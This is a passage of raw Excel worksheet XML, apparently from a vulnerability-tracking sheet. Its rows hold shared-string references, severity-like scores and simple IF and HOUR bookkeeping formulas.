      <c r="U468" s="4"/>
      <c r="V468" s="7"/>
    </row>
    <row r="469" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A469" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B469" s="4" t="s">
        <v>2601</v>
      </c>
      <c r="C469" s="4" t="s">
        <v>2602</v>
      </c>
      <c r="D469" s="4" t="s">
        <v>2603</v>
      </c>
      <c r="E469" s="4" t="s">
        <v>2604</v>
      </c>
      <c r="F469" s="4" t="s">
        <v>2605</v>
      </c>
      <c r="G469" s="4" t="s">
        <v>2606</v>
      </c>
      <c r="H469" s="4">
        <v>7.1</v>
      </c>
      <c r="I469" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J469" s="4"/>
      <c r="K469" s="4"/>
      <c r="L469" s="4">
        <f>IF(out!$G469="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M469" s="4"/>
      <c r="N469" s="4"/>
      <c r="O469" s="13"/>
      <c r="P469" s="4"/>
      <c r="Q469" s="13">
        <f>HOUR(out!$P469 -out!$N469)</f>
        <v>0</v>
      </c>
      <c r="R469" s="18"/>
      <c r="S469" s="4"/>
      <c r="T469" s="4"/>
      <c r="U469" s="4"/>
      <c r="V469" s="7"/>
    </row>
    <row r="470" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A470" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B470" s="4" t="s">
        <v>2607</v>
      </c>
      <c r="C470" s="4" t="s">
        <v>2608</v>
      </c>
      <c r="D470" s="4" t="s">
        <v>2609</v>
      </c>
      <c r="E470" s="4" t="s">
        <v>2610</v>
      </c>
      <c r="F470" s="4" t="s">
        <v>2611</v>
      </c>
      <c r="G470" s="4" t="s">
        <v>2612</v>
      </c>
      <c r="H470" s="4">
        <v>7.1</v>
      </c>
      <c r="I470" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J470" s="4"/>
      <c r="K470" s="4"/>
      <c r="L470" s="4">
        <f>IF(out!$G470="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M470" s="4"/>
      <c r="N470" s="4"/>
      <c r="O470" s="13"/>
      <c r="P470" s="4"/>
      <c r="Q470" s="13">
        <f>HOUR(out!$P470 -out!$N470)</f>
        <v>0</v>
      </c>
      <c r="R470" s="18"/>
      <c r="S470" s="4"/>
      <c r="T470" s="4"/>
      <c r="U470" s="4"/>
      <c r="V470" s="7"/>
    </row>
    <row r="471" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A471" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B471" s="4" t="s">
        <v>2613</v>
      </c>
      <c r="C471" s="4" t="s">
        <v>2614</v>
      </c>
      <c r="D471" s="4" t="s">
        <v>2615</v>
      </c>
      <c r="E471" s="4" t="s">
        <v>2616</v>
      </c>
      <c r="F471" s="4" t="s">
        <v>212</v>
      </c>
      <c r="G471" s="4" t="s">
        <v>213</v>
      </c>
      <c r="H471" s="4">
        <v>7.1</v>
      </c>
      <c r="I471" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J471" s="4"/>
      <c r="K471" s="4"/>
      <c r="L471" s="4">
        <f>IF(out!$G471="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M471" s="4"/>
      <c r="N471" s="4"/>
      <c r="O471" s="13"/>
      <c r="P471" s="4"/>
      <c r="Q471" s="13">
        <f>HOUR(out!$P471 -out!$N471)</f>
        <v>0</v>
      </c>
      <c r="R471" s="18"/>
      <c r="S471" s="4"/>
      <c r="T471" s="4"/>
      <c r="U471" s="4"/>
      <c r="V471" s="7"/>
    </row>
    <row r="472" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A472" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B472" s="4" t="s">
        <v>2617</v>
      </c>
      <c r="C472" s="4" t="s">
        <v>2618</v>
      </c>
      <c r="D472" s="4" t="s">
        <v>2619</v>
      </c>
      <c r="E472" s="4" t="s">
        <v>2620</v>
      </c>
      <c r="F472" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G472" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H472" s="4">
        <v>5.3</v>
      </c>
      <c r="I472" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J472" s="4"/>
      <c r="K472" s="4"/>
      <c r="L472" s="4">
        <f>IF(out!$G472="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M472" s="4"/>
      <c r="N472" s="4"/>
      <c r="O472" s="13"/>
      <c r="P472" s="4"/>
      <c r="Q472" s="13">
        <f>HOUR(out!$P472 -out!$N472)</f>
        <v>0</v>
      </c>
      <c r="R472" s="18"/>
      <c r="S472" s="4"/>
      <c r="T472" s="4"/>
      <c r="U472" s="4"/>
      <c r="V472" s="7"/>
    </row>
    <row r="473" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A473" s="3" t="s">
        <v>2621</v>
      </c>
      <c r="B473" s="4" t="s">
        <v>2622</v>
      </c>
      <c r="C473" s="4" t="s">
        <v>2623</v>
      </c>
      <c r="D473" s="4" t="s">
        <v>2624</v>
      </c>
      <c r="E473" s="4" t="s">
        <v>2625</v>
      </c>
      <c r="F473" s="4" t="s">
        <v>2626</v>
      </c>
      <c r="G473" s="4" t="s">
        <v>2627</v>
      </c>
      <c r="H473" s="4">
        <v>10</v>
      </c>
      <c r="I473" s="4" t="s">
        <v>85</v>
      </c>
      <c r="J473" s="4"/>
      <c r="K473" s="4"/>
      <c r="L473" s="4">
        <f>IF(out!$G473="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M473" s="4"/>
      <c r="N473" s="4"/>
      <c r="O473" s="13"/>
      <c r="P473" s="4"/>
      <c r="Q473" s="13">
        <f>HOUR(out!$P473 -out!$N473)</f>
        <v>0</v>
      </c>
      <c r="R473" s="18"/>
      <c r="S473" s="4"/>
      <c r="T473" s="4"/>
      <c r="U473" s="4"/>
      <c r="V473" s="7"/>
    </row>
    <row r="474" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A474" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B474" s="4" t="s">
        <v>2628</v>
      </c>
      <c r="C474" s="4" t="s">
        <v>2629</v>
      </c>
      <c r="D474" s="4" t="s">
        <v>2630</v>
      </c>
      <c r="E474" s="4" t="s">
        <v>2631</v>
      </c>
      <c r="F474" s="4" t="s">
        <v>2632</v>
      </c>
      <c r="G474" s="4" t="s">
        <v>2633</v>
      </c>
      <c r="H474" s="4">
        <v>7.1</v>
      </c>
      <c r="I474" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J474" s="4"/>
      <c r="K474" s="4"/>
      <c r="L474" s="4">
        <f>IF(out!$G474="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M474" s="4"/>
      <c r="N474" s="4"/>
      <c r="O474" s="13"/>
      <c r="P474" s="4"/>
      <c r="Q474" s="13">
        <f>HOUR(out!$P474 -out!$N474)</f>
        <v>0</v>
      </c>
      <c r="R474" s="18"/>
      <c r="S474" s="4"/>
      <c r="T474" s="4"/>
      <c r="U474" s="4"/>
      <c r="V474" s="7"/>
    </row>
    <row r="475" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A475" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B475" s="4" t="s">
        <v>2634</v>
      </c>
      <c r="C475" s="4" t="s">
        <v>2635</v>
      </c>
      <c r="D475" s="4" t="s">
        <v>2636</v>
      </c>
      <c r="E475" s="4" t="s">
        <v>2637</v>
      </c>
      <c r="F475" s="4" t="s">
        <v>2638</v>
      </c>
      <c r="G475" s="4" t="s">
        <v>2639</v>
      </c>
      <c r="H475" s="4">
        <v>7.1</v>
      </c>
      <c r="I475" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J475" s="4"/>
      <c r="K475" s="4"/>
      <c r="L475" s="4">
        <f>IF(out!$G475="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M475" s="4"/>
      <c r="N475" s="4"/>
      <c r="O475" s="13"/>
      <c r="P475" s="4"/>
      <c r="Q475" s="13">
        <f>HOUR(out!$P475 -out!$N475)</f>
        <v>0</v>
      </c>
      <c r="R475" s="18"/>
      <c r="S475" s="4"/>
      <c r="T475" s="4"/>
      <c r="U475" s="4"/>
      <c r="V475" s="7"/>
    </row>
    <row r="476" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A476" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B476" s="4" t="s">
        <v>2640</v>
      </c>
      <c r="C476" s="4" t="s">
        <v>2641</v>
      </c>
      <c r="D476" s="4" t="s">
        <v>2642</v>
      </c>
      <c r="E476" s="4" t="s">
        <v>2643</v>
      </c>
      <c r="F476" s="4" t="s">
        <v>2644</v>
      </c>
      <c r="G476" s="4" t="s">
        <v>2645</v>
      </c>
      <c r="H476" s="4">
        <v>7.1</v>
      </c>
      <c r="I476" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J476" s="4"/>
      <c r="K476" s="4"/>
      <c r="L476" s="4">
        <f>IF(out!$G476="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M476" s="4"/>
      <c r="N476" s="4"/>
      <c r="O476" s="13"/>
      <c r="P476" s="4"/>
      <c r="Q476" s="13">
        <f>HOUR(out!$P476 -out!$N476)</f>
        <v>0</v>
      </c>
      <c r="R476" s="18"/>
      <c r="S476" s="4"/>
      <c r="T476" s="4"/>
      <c r="U476" s="4"/>
      <c r="V476" s="7"/>
    </row>
    <row r="477" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A477" s="3" t="s">
        <v>1781</v>
      </c>
      <c r="B477" s="4" t="s">
        <v>2646</v>
      </c>
      <c r="C477" s="4" t="s">
        <v>2647</v>
      </c>
      <c r="D477" s="4" t="s">
        <v>2648</v>
      </c>
      <c r="E477" s="4" t="s">
        <v>2649</v>
      </c>
      <c r="F477" s="4" t="s">
        <v>2650</v>
      </c>
      <c r="G477" s="4" t="s">
        <v>2651</v>
      </c>
      <c r="H477" s="4">
        <v>7.1</v>
      </c>
      <c r="I477" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J477" s="4"/>
      <c r="K477" s="4"/>
      <c r="L477" s="4">
        <f>IF(out!$G477="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M477" s="4"/>
      <c r="N477" s="4"/>
      <c r="O477" s="13"/>
      <c r="P477" s="4"/>
      <c r="Q477" s="13">
        <f>HOUR(out!$P477 -out!$N477)</f>
        <v>0</v>
      </c>
      <c r="R477" s="18"/>
      <c r="S477" s="4"/>
      <c r="T477" s="4"/>
      <c r="U477" s="4"/>
      <c r="V477" s="7"/>
    </row>
    <row r="478" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A478" s="3" t="s">
        <v>2652</v>
      </c>
      <c r="B478" s="4" t="s">
        <v>2653</v>
      </c>
      <c r="C478" s="4" t="s">
        <v>2654</v>
      </c>
      <c r="D478" s="4" t="s">
        <v>2655</v>
      </c>
      <c r="E478" s="4" t="s">
        <v>2656</v>
      </c>
      <c r="F478" s="4" t="s">
        <v>2657</v>
      </c>
      <c r="G478" s="4" t="s">
        <v>2658</v>
      </c>
      <c r="H478" s="4">
        <v>4.8</v>
      </c>
      <c r="I478" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J478" s="4"/>
      <c r="K478" s="4"/>
      <c r="L478" s="4">
        <f>IF(out!$G478="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M478" s="4"/>
      <c r="N478" s="4"/>
      <c r="O478" s="13"/>
      <c r="P478" s="4"/>
      <c r="Q478" s="13">
        <f>HOUR(out!$P478 -out!$N478)</f>
        <v>0</v>
      </c>
      <c r="R478" s="18"/>
      <c r="S478" s="4"/>
      <c r="T478" s="4"/>
      <c r="U478" s="4"/>
      <c r="V478" s="7"/>
    </row>
    <row r="479" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A479" s="3" t="s">
        <v>2659</v>
      </c>
      <c r="B479" s="4" t="s">
        <v>2660</v>
      </c>
      <c r="C479" s="4" t="s">
        <v>2661</v>
      </c>
      <c r="D479" s="4" t="s">
        <v>2662</v>
      </c>
      <c r="E479" s="4" t="s">
        <v>2663</v>
      </c>
      <c r="F479" s="4" t="s">
        <v>2664</v>
      </c>
      <c r="G479" s="4" t="s">
        <v>2665</v>
      </c>
      <c r="H479" s="4">
        <v>4.2</v>
      </c>
      <c r="I479" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J479" s="4"/>
      <c r="K479" s="4"/>
      <c r="L479" s="4">
        <f>IF(out!$G479="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M479" s="4"/>
      <c r="N479" s="4"/>
      <c r="O479" s="13"/>
      <c r="P479" s="4"/>
      <c r="Q479" s="13">
        <f>HOUR(out!$P479 -out!$N479)</f>
        <v>0</v>
      </c>
      <c r="R479" s="18"/>
      <c r="S479" s="4"/>
      <c r="T479" s="4"/>
      <c r="U479" s="4"/>
      <c r="V479" s="7"/>
    </row>
    <row r="480" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A480" s="3" t="s">
        <v>2666</v>
      </c>
      <c r="B480" s="4" t="s">
        <v>2667</v>
      </c>
      <c r="C480" s="4" t="s">
        <v>2668</v>
      </c>
      <c r="D480" s="4" t="s">
        <v>2655</v>
      </c>
      <c r="E480" s="4" t="s">
        <v>2656</v>
      </c>
      <c r="F480" s="4" t="s">
        <v>2669</v>
      </c>
      <c r="G480" s="4" t="s">
        <v>2670</v>
      </c>
      <c r="H480" s="4">
        <v>6.5</v>
      </c>
      <c r="I480" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J480" s="4"/>
      <c r="K480" s="4"/>
      <c r="L480" s="4">
        <f>IF(out!$G480="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M480" s="4"/>
      <c r="N480" s="4"/>
      <c r="O480" s="13"/>
      <c r="P480" s="4"/>
      <c r="Q480" s="13">
        <f>HOUR(out!$P480 -out!$N480)</f>
        <v>0</v>
      </c>
      <c r="R480" s="18"/>
      <c r="S480" s="4"/>
      <c r="T480" s="4"/>
      <c r="U480" s="4"/>
      <c r="V480" s="7"/>
    </row>
    <row r="481" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A481" s="3" t="s">
        <v>2671</v>
      </c>
      <c r="B481" s="4" t="s">
        <v>2672</v>
      </c>
      <c r="C481" s="4" t="s">
        <v>2673</v>
      </c>
      <c r="D481" s="4" t="s">
        <v>2655</v>
      </c>
      <c r="E481" s="4" t="s">
        <v>2656</v>
      </c>
      <c r="F481" s="4" t="s">
        <v>2674</v>
      </c>
      <c r="G481" s="4" t="s">
        <v>2675</v>
      </c>
      <c r="H481" s="4">
        <v>6.5</v>
      </c>
      <c r="I481" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J481" s="4"/>
      <c r="K481" s="4"/>
      <c r="L481" s="4">
        <f>IF(out!$G481="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M481" s="4"/>
      <c r="N481" s="4"/>
      <c r="O481" s="13"/>
      <c r="P481" s="4"/>
      <c r="Q481" s="13">
        <f>HOUR(out!$P481 -out!$N481)</f>
        <v>0</v>
      </c>
      <c r="R481" s="18"/>
      <c r="S481" s="4"/>
      <c r="T481" s="4"/>
      <c r="U481" s="4"/>
      <c r="V481" s="7"/>
    </row>
    <row r="482" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A482" s="3" t="s">
        <v>2676</v>
      </c>
      <c r="B482" s="4" t="s">
        <v>2677</v>
      </c>
      <c r="C482" s="4" t="s">
        <v>2678</v>
      </c>
      <c r="D482" s="4" t="s">
        <v>2679</v>
      </c>
      <c r="E482" s="4" t="s">
        <v>2680</v>
      </c>
      <c r="F482" s="4" t="s">
        <v>138</v>
      </c>
      <c r="G482" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H482" s="4">
        <v>3.5</v>
      </c>
      <c r="I482" s="4" t="s">
        <v>71</v>
      </c>
      <c r="J482" s="4"/>
      <c r="K482" s="4"/>
      <c r="L482" s="4">
        <f>IF(out!$G482="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M482" s="4"/>
      <c r="N482" s="4"/>
      <c r="O482" s="13"/>
      <c r="P482" s="4"/>
      <c r="Q482" s="13">
        <f>HOUR(out!$P482 -out!$N482)</f>
        <v>0</v>
      </c>
      <c r="R482" s="18"/>
      <c r="S482" s="4"/>
      <c r="T482" s="4"/>
      <c r="U482" s="4"/>
      <c r="V482" s="7"/>
    </row>
    <row r="483" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A483" s="3" t="s">
        <v>2666</v>
      </c>
      <c r="B483" s="4" t="s">
        <v>2681</v>
      </c>
      <c r="C483" s="4" t="s">
        <v>2682</v>
      </c>
      <c r="D483" s="4" t="s">
        <v>2683</v>
      </c>
      <c r="E483" s="4" t="s">
        <v>2684</v>
      </c>
      <c r="F483" s="4" t="s">
        <v>2685</v>
      </c>
      <c r="G483" s="4" t="s">
        <v>2686</v>
      </c>
      <c r="H483" s="4">
        <v>8.1999999999999993</v>
      </c>
      <c r="I483" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J483" s="4"/>
      <c r="K483" s="4"/>
      <c r="L483" s="4">
        <f>IF(out!$G483="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M483" s="4"/>
      <c r="N483" s="4"/>
      <c r="O483" s="13"/>
      <c r="P483" s="4"/>
      <c r="Q483" s="13">
        <f>HOUR(out!$P483 -out!$N483)</f>
        <v>0</v>
      </c>
      <c r="R483" s="18"/>
      <c r="S483" s="4"/>
      <c r="T483" s="4"/>
      <c r="U483" s="4"/>
      <c r="V483" s="7"/>
    </row>
    <row r="484" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A484" s="3" t="s">
        <v>2666</v>
      </c>
      <c r="B484" s="4" t="s">
        <v>2687</v>
      </c>
      <c r="C484" s="4" t="s">
        <v>2688</v>
      </c>
      <c r="D484" s="4" t="s">
        <v>2655</v>
      </c>
      <c r="E484" s="4" t="s">
        <v>2656</v>
      </c>
      <c r="F484" s="4" t="s">
        <v>2689</v>
      </c>
      <c r="G484" s="4" t="s">
        <v>2690</v>
      </c>
      <c r="H484" s="4">
        <v>6.5</v>
      </c>
      <c r="I484" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J484" s="4"/>
      <c r="K484" s="4"/>
      <c r="L484" s="4">
        <f>IF(out!$G484="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M484" s="4"/>
      <c r="N484" s="4"/>
      <c r="O484" s="13"/>
      <c r="P484" s="4"/>
      <c r="Q484" s="13">
        <f>HOUR(out!$P484 -out!$N484)</f>
        <v>0</v>
      </c>
      <c r="R484" s="18"/>
      <c r="S484" s="4"/>
      <c r="T484" s="4"/>
      <c r="U484" s="4"/>
      <c r="V484" s="7"/>
    </row>
    <row r="485" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A485" s="3" t="s">
        <v>2691</v>
      </c>
      <c r="B485" s="4" t="s">
        <v>2692</v>
      </c>
      <c r="C485" s="4" t="s">
        <v>2693</v>
      </c>
      <c r="D485" s="4" t="s">
        <v>2694</v>
      </c>
      <c r="E485" s="4" t="s">
        <v>2695</v>
      </c>
      <c r="F485" s="4" t="s">
        <v>2696</v>
      </c>
      <c r="G485" s="4" t="s">
        <v>2697</v>
      </c>
      <c r="H485" s="4">
        <v>8.1999999999999993</v>
      </c>
      <c r="I485" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J485" s="4"/>
      <c r="K485" s="4"/>
      <c r="L485" s="4">
        <f>IF(out!$G485="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M485" s="4"/>
      <c r="N485" s="4"/>
      <c r="O485" s="13"/>
      <c r="P485" s="4"/>
      <c r="Q485" s="13">
        <f>HOUR(out!$P485 -out!$N485)</f>
        <v>0</v>
      </c>
      <c r="R485" s="18"/>
      <c r="S485" s="4"/>
      <c r="T485" s="4"/>
      <c r="U485" s="4"/>
      <c r="V485" s="7"/>
    </row>
    <row r="486" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A486" s="3" t="s">
        <v>898</v>
      </c>
      <c r="B486" s="4" t="s">
        <v>2698</v>
      </c>
      <c r="C486" s="4" t="s">
        <v>2699</v>
      </c>
      <c r="D486" s="4" t="s">
        <v>2700</v>
      </c>
      <c r="E486" s="4" t="s">
        <v>2701</v>
      </c>
      <c r="F486" s="4" t="s">
        <v>2702</v>
      </c>
      <c r="G486" s="4" t="s">
        <v>2703</v>
      </c>
      <c r="H486" s="4">
        <v>10</v>
      </c>
      <c r="I486" s="4" t="s">
        <v>85</v>
      </c>
      <c r="J486" s="4"/>
      <c r="K486" s="4"/>
      <c r="L486" s="4">
        <f>IF(out!$G486="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M486" s="4"/>
      <c r="N486" s="4"/>
      <c r="O486" s="13"/>
      <c r="P486" s="4"/>
      <c r="Q486" s="13">
        <f>HOUR(out!$P486 -out!$N486)</f>
        <v>0</v>
      </c>
      <c r="R486" s="18"/>
      <c r="S486" s="4"/>
      <c r="T486" s="4"/>
      <c r="U486" s="4"/>
      <c r="V486" s="7"/>
    </row>
    <row r="487" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A487" s="3" t="s">
        <v>2704</v>
      </c>
      <c r="B487" s="4" t="s">
        <v>2705</v>
      </c>
      <c r="C487" s="4" t="s">
        <v>2706</v>
      </c>
      <c r="D487" s="4" t="s">
        <v>2707</v>
      </c>
      <c r="E487" s="4" t="s">
        <v>2708</v>
      </c>
      <c r="F487" s="4" t="s">
        <v>2709</v>
      </c>
      <c r="G487" s="4" t="s">
        <v>2710</v>
      </c>
      <c r="H487" s="4">
        <v>6.3</v>
      </c>
      <c r="I487" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J487" s="4"/>
      <c r="K487" s="4"/>
      <c r="L487" s="4">
        <f>IF(out!$G487="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M487" s="4"/>
      <c r="N487" s="4"/>
      <c r="O487" s="13"/>
      <c r="P487" s="4"/>
      <c r="Q487" s="13">
        <f>HOUR(out!$P487 -out!$N487)</f>
        <v>0</v>
      </c>
      <c r="R487" s="18"/>
      <c r="S487" s="4"/>
      <c r="T487" s="4"/>
      <c r="U487" s="4"/>
      <c r="V487" s="7"/>
    </row>
    <row r="488" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A488" s="3" t="s">
        <v>898</v>
      </c>
      <c r="B488" s="4" t="s">
        <v>2711</v>
      </c>
      <c r="C488" s="4" t="s">
        <v>2712</v>
      </c>
      <c r="D488" s="4" t="s">
        <v>2713</v>
      </c>
      <c r="E488" s="4" t="s">
        <v>2714</v>
      </c>
      <c r="F488" s="4" t="s">
        <v>2715</v>
      </c>
      <c r="G488" s="4" t="s">
        <v>2716</v>
      </c>
      <c r="H488" s="4">
        <v>10</v>
      </c>
      <c r="I488" s="4" t="s">
        <v>85</v>
      </c>
      <c r="J488" s="4"/>
      <c r="K488" s="4"/>
      <c r="L488" s="4">
        <f>IF(out!$G488="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M488" s="4"/>
      <c r="N488" s="4"/>
      <c r="O488" s="13"/>
      <c r="P488" s="4"/>
      <c r="Q488" s="13">
        <f>HOUR(out!$P488 -out!$N488)</f>
        <v>0</v>
      </c>
      <c r="R488" s="18"/>
      <c r="S488" s="4"/>
      <c r="T488" s="4"/>
      <c r="U488" s="4"/>
      <c r="V488" s="7"/>
    </row>
    <row r="489" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A489" s="3" t="s">
        <v>2717</v>
      </c>
      <c r="B489" s="4" t="s">
        <v>2718</v>
      </c>
      <c r="C489" s="4" t="s">
        <v>2719</v>
      </c>
      <c r="D489" s="4" t="s">
        <v>2720</v>
      </c>
      <c r="E489" s="4" t="s">
        <v>2721</v>
      </c>
      <c r="F489" s="4" t="s">
        <v>2722</v>
      </c>
      <c r="G489" s="4" t="s">
        <v>2723</v>
      </c>
      <c r="H489" s="4">
        <v>6.5</v>
      </c>
      <c r="I489" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J489" s="4"/>
      <c r="K489" s="4"/>
      <c r="L489" s="4">
        <f>IF(out!$G489="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M489" s="4"/>
      <c r="N489" s="4"/>
      <c r="O489" s="13"/>
      <c r="P489" s="4"/>
      <c r="Q489" s="13">
        <f>HOUR(out!$P489 -out!$N489)</f>
        <v>0</v>
      </c>
      <c r="R489" s="18"/>
      <c r="S489" s="4"/>
      <c r="T489" s="4"/>
      <c r="U489" s="4"/>
      <c r="V489" s="7"/>
    </row>
    <row r="490" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A490" s="3" t="s">
        <v>475</v>
      </c>
      <c r="B490" s="4" t="s">
        <v>2724</v>
      </c>
      <c r="C490" s="4" t="s">
        <v>2725</v>
      </c>
      <c r="D490" s="4" t="s">
        <v>2726</v>
      </c>
      <c r="E490" s="4" t="s">
        <v>2727</v>
      </c>
      <c r="F490" s="4" t="s">
        <v>2728</v>
      </c>
      <c r="G490" s="4" t="s">
        <v>2729</v>
      </c>
      <c r="H490" s="4">
        <v>7.5</v>
      </c>
      <c r="I490" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J490" s="4"/>
      <c r="K490" s="4"/>
      <c r="L490" s="4">
        <f>IF(out!$G490="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M490" s="4"/>
      <c r="N490" s="4"/>
      <c r="O490" s="13"/>
      <c r="P490" s="4"/>
      <c r="Q490" s="13">
        <f>HOUR(out!$P490 -out!$N490)</f>
        <v>0</v>
      </c>
      <c r="R490" s="18"/>
      <c r="S490" s="4"/>
      <c r="T490" s="4"/>
      <c r="U490" s="4"/>
      <c r="V490" s="7"/>
    </row>
    <row r="491" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A491" s="3" t="s">
        <v>2730</v>
      </c>
      <c r="B491" s="4" t="s">
        <v>2731</v>
      </c>
      <c r="C491" s="4" t="s">
        <v>2732</v>
      </c>
      <c r="D491" s="4" t="s">
        <v>2733</v>
      </c>
      <c r="E491" s="4" t="s">
        <v>2734</v>
      </c>
      <c r="F491" s="4" t="s">
        <v>360</v>
      </c>
      <c r="G491" s="4" t="s">
        <v>361</v>
      </c>
      <c r="H491" s="4">
        <v>5.4</v>
      </c>
      <c r="I491" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J491" s="4"/>
      <c r="K491" s="4"/>
      <c r="L491" s="4">
        <f>IF(out!$G491="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M491" s="4"/>
      <c r="N491" s="4"/>
      <c r="O491" s="13"/>
      <c r="P491" s="4"/>
      <c r="Q491" s="13">
        <f>HOUR(out!$P491 -out!$N491)</f>
        <v>0</v>
      </c>
      <c r="R491" s="18"/>
      <c r="S491" s="4"/>
      <c r="T491" s="4"/>
      <c r="U491" s="4"/>
      <c r="V491" s="7"/>
    </row>
    <row r="492" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A492" s="3" t="s">
        <v>475</v>
      </c>
      <c r="B492" s="4" t="s">
        <v>2735</v>
      </c>
      <c r="C492" s="4" t="s">
        <v>2736</v>
      </c>
      <c r="D492" s="4" t="s">
        <v>907</v>
      </c>
      <c r="E492" s="4" t="s">
        <v>908</v>
      </c>
      <c r="F492" s="4" t="s">
        <v>2737</v>
      </c>
      <c r="G492" s="4" t="s">
        <v>2013</v>
      </c>
      <c r="H492" s="4">
        <v>7.5</v>
      </c>
      <c r="I492" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J492" s="4"/>
      <c r="K492" s="4"/>
      <c r="L492" s="4">
        <f>IF(out!$G492="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M492" s="4"/>
      <c r="N492" s="4"/>
      <c r="O492" s="13"/>
      <c r="P492" s="4"/>
      <c r="Q492" s="13">
        <f>HOUR(out!$P492 -out!$N492)</f>
        <v>0</v>
      </c>
      <c r="R492" s="18"/>
      <c r="S492" s="4"/>
      <c r="T492" s="4"/>
      <c r="U492" s="4"/>
      <c r="V492" s="7"/>
    </row>
    <row r="493" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A493" s="3" t="s">
        <v>1908</v>
      </c>
      <c r="B493" s="4" t="s">
        <v>2738</v>
      </c>
      <c r="C493" s="4" t="s">
        <v>2739</v>
      </c>
      <c r="D493" s="4" t="s">
        <v>2740</v>
      </c>
      <c r="E493" s="4" t="s">
        <v>2741</v>
      </c>
      <c r="F493" s="4" t="s">
        <v>2742</v>
      </c>
      <c r="G493" s="4" t="s">
        <v>55</v>
      </c>
      <c r="H493" s="4">
        <v>7.2</v>
      </c>
      <c r="I493" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J493" s="4"/>
      <c r="K493" s="4"/>
      <c r="L493" s="4">
        <f>IF(out!$G493="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M493" s="4"/>
      <c r="N493" s="4"/>
      <c r="O493" s="13"/>
      <c r="P493" s="4"/>
      <c r="Q493" s="13">
        <f>HOUR(out!$P493 -out!$N493)</f>
        <v>0</v>
      </c>
      <c r="R493" s="18"/>
      <c r="S493" s="4"/>
      <c r="T493" s="4"/>
